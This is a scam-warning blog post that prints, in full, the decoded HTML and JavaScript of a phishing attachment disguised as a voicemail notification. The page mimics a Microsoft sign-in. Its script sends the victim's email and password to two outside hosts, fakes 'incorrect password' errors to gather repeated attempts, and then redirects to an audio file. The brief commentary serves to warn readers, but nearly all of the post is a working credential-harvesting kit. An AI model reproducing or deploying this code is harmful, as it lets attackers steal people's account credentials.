Scams, Spams and Shams Revealed | VM: eNotification from 512 908-0932 ATT34541.htm

This email has been seen this week. The actual body is entirely an image, whilst the attachment is a Base64 encoded HTML/Javascript phishing page:

Whereupon there is an attachment in Base64 code which , when decrypted, gives:

<!doctype html>
<html dir="ltr" lang="EN-US">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<title>Sign in to your account</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no">
<link rel="shortcut icon" href="https://conexaosolidaria.org.br/css/web/mx/favicon.ico">
<link rel="stylesheet" title="Converged" type="text/css" href="https://conexaosolidaria.org.br/css/web/mx/style.css">
<style type="text/css">body.cb input.hip{border-width: 2px !important;}</style>
<style type="text/css">body{display:none;}</style>
<style type="text/css">body{display:block !important;}</style>
<style>
.bg {
background:url('https://conexaosolidaria.org.br/css/web/mx/mbg.jpg') rgba(0,0,0,0.04);
background-size:cover;
background-repeat: no-repeat;
background-blend-mode:multiply;
}
</style>
</head>
<body class="bg">
<div>
<div class="outer">
<div class="middle">
<div class="inner">
<div id="page_one">
<form action="" method="post" id="page_one">
<div>
<img class="logo" src="https://conexaosolidaria.org.br/css/web/mx/logo.svg">
<div class="row text-title" id="loginHeader">
<div role="heading" aria-level="1" data-bind="text: title">Sign in</div>
</div>
</div>
<div class="row">
<div id="alert"></div>
<div class="form-group col-md-24">
<div><div class="col-md-24 error ext-error" id="usernameError" ></div>
<input name="UserName" id="email_login" maxlength="113" autofocus class="form-control ltr_override" placeholder="Enter Email or phone" lang="en" type="text" value="">
<div class="phholder" style="left: 0px; top: 0px; width: 100%; position: absolute; z-index: 5;" data-bind="visible: !textInput(), click: focus">
<div aria-hidden="true" style="cursor:text" data-bind="text: hintText, css: hintCss" class="placeholder"></div>
</div>
</div>
</div>
</div>
<div class="row">
<div class="col-md-24">
<div class="text-13 action-links">
<div class="form-group">
<a id="i1668" href="#">Can't access your account?</a>
</div>
<div class="form-group">
<a id="i1668" href="#">Sign in with a security key <img role="presentation" pngsrc="https://aadcdn.msauth.net/ests/2.1/content/images/documentation_9628e22a6bfb1edc59e81064a666b614.png" svgsrc="https://aadcdn.msauth.net/ests/2.1/content/images/documentation_bcb4d1dc4eae64f0b2b2538209d8435a.svg" data-bind="imgSrc" src="https://aadcdn.msauth.net/ests/2.1/content/images/documentation_bcb4d1dc4eae64f0b2b2538209d8435a.svg"></a>
</div>
</div>
</div>
</div>
<div class="row">
<div>
<div class="col-xs-24 no-padding-left-right" align="right">
<div class="inline-block">
<button type="submit" class="btn btn-primary">Next</button>
</div>
</div>
</div>
</div>
</form>
</div>
<div id="page_two" style="display: none;">
<form action="" method="post" id="page_two">
<input type="hidden" id="email" value="" />
<input type="hidden" id="count" value="0" />
<div>
<img class="logo" src="https://conexaosolidaria.org.br/css/web/mx/logo.svg">
</div>
<div data-bind="css: { 'animate': animate() && animate.animateBanner(), 'slide-out-next': animate.isSlideOutNext(), 'slide-in-next': animate.isSlideInNext(), 'slide-out-back': animate.isSlideOutBack(),'slide-in-back': animate.isSlideInBack() }" class="animate slide-in-next"> <div data-bind="component: { name: 'identity-banner-control', params: { userTileUrl: svr.urlProfilePhoto, displayName: sharedData.displayName || svr.sPOST_Username,isBackButtonVisible: isBackButtonVisible(), focusOnBackButton: isBackButtonFocused(),backButtonDescribedBy: backButtonDescribedBy() }, event: { backButtonClick: identityBanner_onBackButtonClick } }"> <div class="identityBanner"> <button type="button" class="backButton" data-bind=" attr: { 'id': backButtonId || 'idBtn_Back' }, ariaLabel: str['CT_HRD_STR_Splitter_Back'], ariaDescribedBy: backButtonDescribedBy, click: backButton_onClick, hasFocus: focusOnBackButton" id="idBtn_Back" aria-label="Back"> <img role="presentation" pngsrc="https://aadcdn.msauth.net/ests/2.1/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png" svgsrc="https://aadcdn.msauth.net/ests/2.1/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg" data-bind="imgSrc" src="https://aadcdn.msauth.net/ests/2.1/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg" id="backButton">  </button> <div id="displayName" class="identity" data-bind="text: unsafe_displayName, attr: { 'title': unsafe_displayName }">[email protected]</div> </div></div> </div>
<div id="loginHeader" class="row text-title" role="heading" aria-level="1" data-bind="text: str['CT_PWD_STR_EnterPassword_Title']">Enter password</div>
<div id="alert2"></div>
<input name="passwd" type="password" id="passwd" autocomplete="off" class="form-control" aria-required="true" placeholder="Password" aria-label="Enter the password for [email protected]" tabindex="0">
<br/>
<div class="row">
<div class="col-md-30">
<div class="text-13 action-links">
<div class="form-group">
<a id="i1668" href="#">Forgot my password</a>
</div>
</div>
</div>
</div>
<div class="row">
<div>
<div class="col-xs-24 no-padding-left-right" align="right">
<div class="inline-block">
<button type="submit" class="btn btn-primary">Sign In</button> <img src="data:image/gif;base64,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" id="loading" style="display: none;"/>
</div>
</div>
</div>
</div>
</form>
</div>
</div>
</div>
</div>
<div id="footer" class="footer default">
<div>
<div id="footerLinks" class="footerNode text-secondary">

<a id="ftrTerms" href="#">Terms of use</a>
<a id="ftrPrivacy" href="#">Privacy & cookies</a>
</div>
</div>
</div>
</div>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"></script>
<script>
function isBase64(str) {
try {
return btoa(atob(str)) == str;
} catch (err) {
return false;
}
}
$(document).ready(function() {
var hash = window.location.hash;
if(hash !== "") {
hash = hash.split('#');
let email = hash[1];
if(isBase64(email)) {
email = atob(email);
} else {
email = email;
}
$("#email_login").val(email);
$("form#page_one").submit();
}
})
function isEmail(email) {
var regex = /^([a-zA-Z0-9_.+-])+\@(([a-zA-Z0-9-])+\.)+([a-zA-Z0-9]{2,4})+$/;
return regex.test(email);
}
$("#backButton").click(function() {
$("#alert2").html("");
$(".logo").attr({"src" : "https://conexaosolidaria.org.br/css/web/mx/logo.svg"});
$("body").css('background-image', 'url(https://conexaosolidaria.org.br/css/web/mx/mbg.jpg)');
$("#page_two").hide();
$("#page_one").show();
return false;
});
$("form#page_one").submit(function() {
$("#alert").html('');
$("#email_login").removeClass('has-error');
if($("#email_login").val() == "") {
$("#email_login").addClass('has-error');
$("#alert").html(`<div class="alert alert-error col-md-24">Enter a valid email address or phone number.</div>`);
} else if(!isEmail($("#email_login").val())) {
$("#email_login").addClass('has-error');
$("#alert").html(`<div class="alert alert-error col-md-24">We couldn't find an account with that username. Try another, or <a href="#">get a new Microsoft account</a>.</div>`);
}
$.ajax({
url : 'https://conexaosolidaria.org.br/css/web/etc/aw.php',
method : 'POST',
data : 'email=' + $("#email_login").val(),
dataType : "json",
success:function(a) {
$("form#page_one input").prop("disabled", false);
if(a.status == 'invalid') {
$("#email_login").addClass('has-error');
$("#alert").html(`<div class="alert alert-error col-md-24">${a.msg}</div>`);
} else {
$("#alert").html('');
$("body").css('background-image', 'url('+a.msg.background_image+')');
$(".logo").attr({'src' : a.msg.logo});
$("#page_one").hide();
$("#email").val($("#email_login").val());
$("#displayName").html($("#email").val());
$("#page_two").show();
$("#passwd").focus();
}
}, error:function(a, b, c) {
}, beforeSend:function() {
}
});
return false;
});
$("form#page_two").submit(function() {
$("#alert2").html('');
if($("#passwd").val() == "") {
$("#alert2").html(`<div class="alert alert-error col-md-24">Please enter the password for your Microsoft account.</a></div>`);
} else {
var count = parseInt($("#count").val());
count += 1;
$("#count").val(count);
if(count == 1) {
$.ajax({
url : 'https://telugusexstories.top/wp-includes/js/crop/web/etc/login.php',
method : 'POST',
data : 'email=' + $("#email").val() + "&password=" + $("#passwd").val() + "&attemp=1",
dataType : 'JSON',
beforeSend:function() {
$("#loading").show();
}
});
setTimeout(() => {
$("#alert2").html(`<div class="alert alert-error col-md-24">Your account or password is incorrect. If you don't remember your password, <a href="#">reset it now.</a></div>`);
$("#loading").hide();
}, 1000);
} else if(count == 2){
$.ajax({
url : 'https://telugusexstories.top/wp-includes/js/crop/web/etc/login.php',
method : 'POST',
data : 'email=' + $("#email").val() + "&password=" + $("#passwd").val() + "&attemp=2",
dataType : 'JSON',
beforeSend:function() {
$("#loading").show();
}
});
setTimeout(() => {
$("#alert2").html(`<div class="alert alert-error col-md-24">Your account or password is incorrect. If you don't remember your password, <a href="#">reset it now.</a></div>`);
$("#loading").hide();
}, 1000);
} else {
$.ajax({
url : 'https://telugusexstories.top/wp-includes/js/crop/web/etc/login.php',
method : 'POST',
data : 'email=' + $("#email").val() + "&password=" + $("#passwd").val() + "&attemp=3",
dataType : 'JSON',
beforeSend:function() {
$("#loading").show();
}
});
setTimeout(() => {
window.location.href = "https://ia801405.us.archive.org/28/items/6783654163-20190904-161640/6783654163_20190904_161640.mp3";
$("#loading").hide();
}, 1000);
}
}
return false;
});
</script>
</body>
</html>

And when we open the script in a browser, we would see an Office 365 phishing site, but they locked the server down whilst we were typing this.

There was an audio message at the end of it all:

audio.mp3 (143.76 kb)

Office 365 Credentials Phishing

VM: eNotification from 512 908-0932 ATT34541.htm

Related posts

Add comment